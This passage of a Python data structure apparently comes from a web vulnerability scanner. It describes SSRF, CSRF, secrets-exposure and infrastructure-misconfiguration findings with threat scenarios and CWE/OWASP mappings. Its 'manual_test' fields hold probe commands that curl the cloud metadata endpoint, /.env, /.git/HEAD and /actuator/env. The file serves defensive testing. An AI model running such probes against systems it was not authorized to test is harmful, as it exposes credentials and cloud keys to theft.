        "manual_test": "curl -s '{url}?url=http://169.254.169.254/latest/meta-data/' or check for URL parameter fetching",
    },
    "csrf": {
        "source_file": "suite-core/core/cve_tester.py",
        "source_function": "test_cve (detected via cookie + CORS analysis)",
        "source_lines": "N/A — inferred from cookie_security + cors_misconfiguration findings",
        "detection_logic": "CSRF risk is inferred from cookie security analysis (missing SameSite attribute) combined with CORS misconfiguration (permissive Access-Control-Allow-Origin). If cookies lack SameSite=Strict and CORS allows arbitrary origins with credentials, CSRF attacks are feasible.",
        "threat_scenario": "An attacker creates a malicious website that submits forms or API requests to the target while the victim is logged in. The victim's browser automatically includes authentication cookies. The attacker can transfer funds, change email addresses, modify settings, or perform any action the victim can — all without the victim's knowledge.",
        "threat_actor": "Phishing operator to organized crime",
        "attack_complexity": "LOW",
        "business_impact": [
            "Unauthorized transactions",
            "Account settings modification",
            "Data manipulation",
            "Privilege escalation via admin CSRF",
        ],
        "owasp_top10": "A01:2021 – Broken Access Control",
        "stride": "Spoofing, Tampering",
        "cwe": "CWE-352",
        "real_world_examples": [
            "Netflix CSRF (2006) — account takeover",
            "ING Direct CSRF — unauthorized fund transfers",
            "WordPress admin CSRF for plugin installation (numerous)",
        ],
        "os_relevance": "All — browser-based, OS-independent",
        "remediation_priority": "HIGH",
        "manual_test": "Check for anti-CSRF tokens in forms: curl -s '{url}' | grep -iE '(csrf|_token|authenticity_token)'",
    },
    "secrets_exposure": {
        "source_file": _SRC,
        "source_function": "_check_information_disclosure",
        "source_lines": "748-793 (subset of information disclosure)",
        "detection_logic": "Probes for exposed secrets files: /.env (environment variables with API keys, DB passwords), /.git/HEAD (source code repository), /wp-config.php.bak (WordPress database credentials), /config.json. Checks response for patterns indicating real secrets (password=, api_key=, secret=, token=).",
        "threat_scenario": "A developer accidentally deploys a .env file or leaves .git directory accessible. The attacker downloads it and obtains: database passwords → direct DB access, API keys → cloud service abuse, JWT secrets → forging authentication tokens, SMTP credentials → sending phishing emails as the company.",
        "threat_actor": "Automated scanner (Shodan, GitHub dorking) to targeted attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "Direct database access",
            "Cloud service abuse via leaked API keys",
            "Authentication token forgery",
            "Supply chain compromise via source code theft",
        ],
        "owasp_top10": "A02:2021 – Cryptographic Failures",
        "stride": "Information Disclosure",
        "cwe": "CWE-798",
        "real_world_examples": [
            "Uber .env exposure leading to AWS key compromise",
            "Samsung source code leaked via exposed .git",
            "GitHub secret scanning finds thousands of API keys daily",
        ],
        "os_relevance": "All — file-based, path-dependent",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -s '{url}/.env' | head -20 && curl -s '{url}/.git/HEAD' | head -5",
    },
    "iac_misconfiguration": {
        "source_file": "suite-core/core/cve_tester.py",
        "source_function": "test_cve (infrastructure configuration analysis)",
        "source_lines": "N/A — detected via architecture profiling + header analysis",
        "detection_logic": "Combines findings from security headers analysis, SSL/TLS configuration, cookie security, WAF detection, and technology fingerprinting to assess overall Infrastructure-as-Code security posture. Checks for common misconfigurations: default configurations, verbose error pages, directory listing, exposed management interfaces.",
        "threat_scenario": "Infrastructure misconfiguration is the #1 cause of cloud breaches. Misconfigured S3 buckets expose data, open security groups allow unrestricted access, default credentials on management interfaces grant admin access. IaC scanning catches these before deployment — runtime scanning catches what was missed.",
        "threat_actor": "Automated scanner to nation-state — misconfigurations are the easiest entry point",
        "attack_complexity": "LOW",
        "business_impact": [
            "Data exposure via misconfigured storage",
            "Unauthorized access via open ports",
            "Full infrastructure compromise via default credentials",
            "Compliance violations (CIS benchmarks)",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Information Disclosure, Elevation of Privilege",
        "cwe": "CWE-16",
        "real_world_examples": [
            "Capital One S3 misconfiguration (2019) — 100M records",
            "Accenture AWS S3 exposure (2017) — sensitive data",
            "Docker Hub exposed 190K accounts via misconfigured infrastructure",
        ],
        "os_relevance": "Cloud-specific (AWS/GCP/Azure) and on-premises (Kubernetes, Docker)",
        "remediation_priority": "HIGH",
        "manual_test": "Review infrastructure: curl -s '{url}/server-status' && curl -s '{url}/actuator/env' && curl -s '{url}/.env'",
    },
}
